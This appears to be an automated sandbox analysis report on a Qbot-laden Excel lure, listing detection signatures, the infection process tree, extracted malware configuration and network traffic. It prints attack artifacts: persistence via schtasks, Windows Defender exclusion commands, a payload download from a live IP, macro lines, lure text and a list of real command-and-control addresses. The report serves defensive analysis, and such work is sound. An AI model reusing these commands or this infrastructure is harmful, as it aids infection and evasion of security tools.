Play interactive tour

Edit tour

Windows Analysis Report CompensationClaim-1630636598-09282021.xls

Overview

General Information

Sample Name:	CompensationClaim-1630636598-09282021.xls
Analysis ID:	492661
MD5:	f3e5e9eb94f7bc0115c4b373093d085d
SHA1:	2142f513fa165dbc4fe13d5aa1ccc10f029f31c5
SHA256:	a57b036af033da6944bb62320662310585d2f23b1d275cd7f01f9c786608e551
Tags:	xls
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Qbot

Document exploit detected (drops PE files)

Sigma detected: Schedule system process

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Office process drops PE file

Writes to foreign memory regions

Uses cmd line tools excessively to alter registry or file data

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates memory in foreign processes

Injects code into the Windows Explorer (explorer.exe)

Sigma detected: Regsvr32 Command Line Without DLL

Drops PE files to the user root directory

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Yara detected hidden Macro 4.0 in Excel

Uses schtasks.exe or at.exe to add and modify task schedules

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Drops files with a non-matching file extension (content does not match file extension)

PE file does not import any functions

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Uses reg.exe to modify the Windows registry

Document contains embedded VBA macros

Drops PE files to the user directory

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3032 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

regsvr32.exe (PID: 2592 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2540 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)

explorer.exe (PID: 448 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

schtasks.exe (PID: 1840 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

regsvr32.exe (PID: 2032 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2416 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 1584 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2912 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)

explorer.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

reg.exe (PID: 3024 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

reg.exe (PID: 1136 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Xicyyyqnqeyf' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

regsvr32.exe (PID: 1636 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2044 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)

cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama105", "Campaign": "1632819007", "Version": "402.343", "C2 list": ["120.150.218.241:995", "95.77.223.148:443", "185.250.148.74:443", "181.118.183.94:443", "105.198.236.99:443", "140.82.49.12:443", "37.210.152.224:995", "89.101.97.139:443", "81.241.252.59:2078", "27.223.92.142:995", "81.250.153.227:2222", "73.151.236.31:443", "47.22.148.6:443", "122.11.220.212:2222", "120.151.47.189:443", "199.27.127.129:443", "216.201.162.158:443", "136.232.34.70:443", "76.25.142.196:443", "75.66.88.33:443", "45.46.53.140:2222", "173.25.166.81:443", "103.148.120.144:443", "173.21.10.71:2222", "186.18.205.199:995", "71.74.12.34:443", "67.165.206.193:993", "47.40.196.233:2222", "68.204.7.158:443", "47.40.196.233:2222", "24.229.150.54:995", "109.12.111.14:443", "177.130.82.197:2222", "72.252.201.69:443", "24.55.112.61:443", "24.139.72.117:443", "187.156.138.172:443", "71.80.168.245:443", "196.217.156.63:995", "82.77.137.101:995", "173.234.155.233:443", "75.188.35.168:443", "5.238.149.235:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
CompensationClaim-1630636598-09282021.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000D.00000002.631006029.00000000001D0000.00000004.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000006.00000002.616094137.00000000001E0000.00000004.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
13.2.regsvr32.exe.1d0000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
7.2.explorer.exe.c0000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
6.2.regsvr32.exe.1e0000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
7.2.explorer.exe.c0000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
13.2.regsvr32.exe.10000000.8.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
6.2.regsvr32.exe.10000000.8.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3032, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 2592

Sigma detected: Regsvr32 Command Line Without DLL

Show sources

Source: Process started

Author: Florian Roth: Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2592, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 2540

Persistence and Installation Behavior:

Sigma detected: Schedule system process

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 448, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29, ProcessId: 1840

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 6.2.regsvr32.exe.1e0000.0.raw.unpack

Malware Configuration Extractor: Qbot {"Bot id": "obama105", "Campaign": "1632819007", "Version": "402.343", "C2 list": ["120.150.218.241:995", "95.77.223.148:443", "185.250.148.74:443", "181.118.183.94:443", "105.198.236.99:443", "140.82.49.12:443", "37.210.152.224:995", "89.101.97.139:443", "81.241.252.59:2078", "27.223.92.142:995", "81.250.153.227:2222", "73.151.236.31:443", "47.22.148.6:443", "122.11.220.212:2222", "120.151.47.189:443", "199.27.127.129:443", "216.201.162.158:443", "136.232.34.70:443", "76.25.142.196:443", "75.66.88.33:443", "45.46.53.140:2222", "173.25.166.81:443", "103.148.120.144:443", "173.21.10.71:2222", "186.18.205.199:995", "71.74.12.34:443", "67.165.206.193:993", "47.40.196.233:2222", "68.204.7.158:443", "47.40.196.233:2222", "24.229.150.54:995", "109.12.111.14:443", "177.130.82.197:2222", "72.252.201.69:443", "24.55.112.61:443", "24.139.72.117:443", "187.156.138.172:443", "71.80.168.245:443", "196.217.156.63:995", "82.77.137.101:995", "173.234.155.233:443", "75.188.35.168:443", "5.238.149.235:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat

ReversingLabs: Detection: 15%

Source: 6.2.regsvr32.exe.2710000.7.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 13.2.regsvr32.exe.1510000.7.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.619382227.0000000002780000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,	6_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000CAEB4 FindFirstFileW,FindNextFileW,	7_2_000CAEB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,	13_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,	14_2_0008AEB4

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: 44467.926671412[1].dat.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 190.14.37.187:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 190.14.37.187:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 20:14:50 GMTContent-Type: application/octet-streamContent-Length: 259072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44467.926671412.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 16 03 00 00 da 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 27 06 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 30 03 00 70 00 00 00 f4 60 27 06 7c 01 00 00 00 70 27 06 d8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 27 06 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a 14 03 00 00 10 00 00 00 16 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 30 03 00 00 02 00 00 00 1a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 10 00 00 00 40 03 00 00 60 00 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 30 06 24 06 00 50 03 00 00 68 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 6e 07 00 00 00 60 27 06 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 07 00 00 00 70 27 06 00 08 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /44467.926671412.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.187Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.187

Source: regsvr32.exe, 00000006.00000002.616692912.00000000020E0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.619981269.0000000001C90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.616276328.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.620593142.0000000001CE0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.621391071.0000000001C40000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.633974439.0000000000970000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.616692912.00000000020E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881939093.0000000001FD0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat

Jump to behavior

Source: global traffic

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable editing" 20 from the yellow bar above. 21 example of notification 22 23 ( 0 PROTECTH)WARN
Source: Screenshot number: 4	Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the 27 decryption of the docum
Source: Screenshot number: 4	Screenshot OCR: Enable Macros ) 32 33 :: Why I can not open th"s document? 36 37 - You are using iOS or Android
Source: Document image extraction number: 0	Screenshot OCR: Enable editing" from the yellow bar above. example of notification ( 0 ~ECTHWARNING This file ori
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the decryption of the document
Source: Document image extraction number: 0	Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1	Screenshot OCR: Enable editing" from the yellow bar above. example of notification ( 0 PROTECTH)WARNNG Thisfileor
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the decryption of the document
Source: Document image extraction number: 1	Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10016EB0	6_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10012346	6_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10011758	6_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10014FC0	6_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000D6EB0	7_2_000D6EB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000D2346	7_2_000D2346
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000D1758	7_2_000D1758
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000D4FC0	7_2_000D4FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10016EB0	13_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10012346	13_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10011758	13_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10014FC0	13_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00096EB0	14_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00092346	14_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00091758	14_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00094FC0	14_2_00094FC0

Source: CompensationClaim-1630636598-09282021.xls	OLE, VBA macro line: Sub auto_open()
Source: CompensationClaim-1630636598-09282021.xls	OLE, VBA macro line: Sub auto_close()
Source: CompensationClaim-1630636598-09282021.xls	OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: CompensationClaim-1630636598-09282021.xls	OLE, VBA macro line: Private Sub saWorkbook_Opensa()

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,	6_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,	6_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,	13_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,	13_2_1000CB77

Source: Drezd.red.14.dr	Static PE information: No import functions for PE file found
Source: Drezd.red.7.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0'

Source: CompensationClaim-1630636598-09282021.xls

OLE indicator, VBA macros: true

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat 405E8907B3775351B266445FAE051055A10D97FB89ED926B5FA083F32028F5D4
Source: Joe Sandbox View	Dropped File: C:\Users\user\Drezd.red 2382A58FAE508FA15BD5D02A39504B9C2898E8737BA417CB6EE54BD2A8804989

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: .................................&B.....(.P.....`...............................................................................................	Jump to behavior
